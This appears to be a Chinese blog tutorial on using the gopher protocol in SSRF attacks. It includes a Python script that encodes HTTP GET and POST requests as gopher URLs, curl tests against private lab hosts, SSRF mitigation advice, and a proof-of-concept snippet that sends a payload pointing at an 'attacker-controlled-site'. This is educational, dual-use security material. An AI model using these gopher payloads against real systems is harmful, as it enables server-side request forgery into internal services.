gopher协议及ssrf

gopher协议

1.GET

1.最简单的get请求
GET /b.php?q=1 HTTP/1.1
Host: 192.168.47.244


2.gopher改写
gopher://192.168.47.244:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0A%0D%0A
使用的python脚本
import urllib.parse

ip = "192.168.47.244"
port = "80"
body = \
"""GET /b.php?q=1 HTTP/1.1
Host: 192.168.47.244

"""

body = urllib.parse.quote(body)
body = body.replace("%0A", "%0D%0A")
payload = f"gopher://{ip}:{port}/_" + body
print(payload)
3.测试

apcahe/2.4.43

php/7.4.*

curl/7.68.0

测试源码php

<?php
	if(isset($_GET['q'])){
		echo "Hello ".$_GET['q']."<br/>";
	}
?>
kali-curl测试
  • kali -> kali
curl gopher://192.168.47.162:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 08:54:01 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 12
Content-Type: text/html; charset=UTF-8

Hello 1<br/>
  • kali -> windows
curl gopher://192.168.47.244:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 09:00:37 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

6
1<br/>
0



windows-curl测试
  • windows -> kali
curl gopher://192.168.47.244:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:02:18 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

c
Hello 1<br/>
0


  • windows -> windows
curl gopher://192.168.47.162:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:01:31 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 12
Content-Type: text/html; charset=UTF-8

Hello 1<br/>

2.POST

1.最简单的post请求

post请求与get请求不同,post请求有四个字段是必须发送的

需要传递Content-Type,Content-Length,host,post的参数

Content-Type

Content-Length可以用Burpsuit自动补

POST /b.php?q=1 HTTP/1.1
Host: 192.168.47.244
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

q=Myname
2.gopher改写
gopher://192.168.47.244:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
python
import urllib.parse

ip = "192.168.47.244"
port = "80"
data = \
"""POST /b.php?q=1 HTTP/1.1
Host: 192.168.47.244
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

q=Myname"""

data = urllib.parse.quote(data)
data = data.replace("%0A", "%0D%0A")
payload = f"gopher://{ip}:{port}/_" + data
print(payload)
3.测试
1.kali-curl
  • kali -> kali
curl gopher://192.168.47.162:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:36:57 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 17
Content-Type: text/html; charset=UTF-8

Hello Myname<br/>u
  • kali -> windows
curl gopher://192.168.47.244:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMynameHTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:34:34 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

11
Hello Myname<br/>
0


2.windows-curl
  • windows -> kali
curl gopher://192.168.47.162:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:38:35 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 17
Content-Type: text/html; charset=UTF-8

Hello Myname<br/>
  • windows -> windows
curl gopher://192.168.47.244:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:37:44 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

11
Hello Myname<br/>
0


3.响应不同问题

windows搭建的服务器对curl的响应与kali搭建的服务器对curl gopher协议的响应有一些差别,但都成功响应,目前不清楚原因。

4.curl

curl在7.79.1版本不支持gopher协议

### 关于SSRF漏洞中的Gopher协议 在服务器端请求伪造(Server-Side Request Forgery, SSRF)攻击中,利用特定协议可以扩大攻击面并提升危害程度。其中一种值得注意的是 Gopher 协议。此协议允许客户端通过简单的字符串命令来获取远程资源,在某些情况下可被恶意利用。 当应用程序未充分验证用户输入即用于发起 HTTP 请求时,则可能存在 SSRF 风险[^1]。如果目标系统支持非标准 URL 方案如 `gopher://` 并且缺乏适当过滤机制的话,那么攻击者就有可能构造特殊形式的数据包以执行任意指令或读取本地文件等内容。 对于 Jira 这样的应用而言,已知存在可以通过精心设计的 URL 来触发内部服务调用的情况,这其中包括但不限于使用 gopher 协议来进行非法操作的可能性。为了防止此类问题的发生,开发人员应当严格控制对外部网络连接的支持范围,并实施白名单策略限制可用方案种类;同时还要注意对所有来自用户的参数做全面的安全审查。 ```python import requests url = "http://example.com/vulnerable_endpoint" payload = 'gopher://attacker-controlled-site/...' response = requests.get(url, params={'param': payload}) print(response.text) ``` 上述代码片段展示了如何向易受攻击的服务发送包含有潜在危险 URI 的 GET 请求。请注意实际环境中不应如此实现,而仅作为概念证明展示可能存在的风险点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值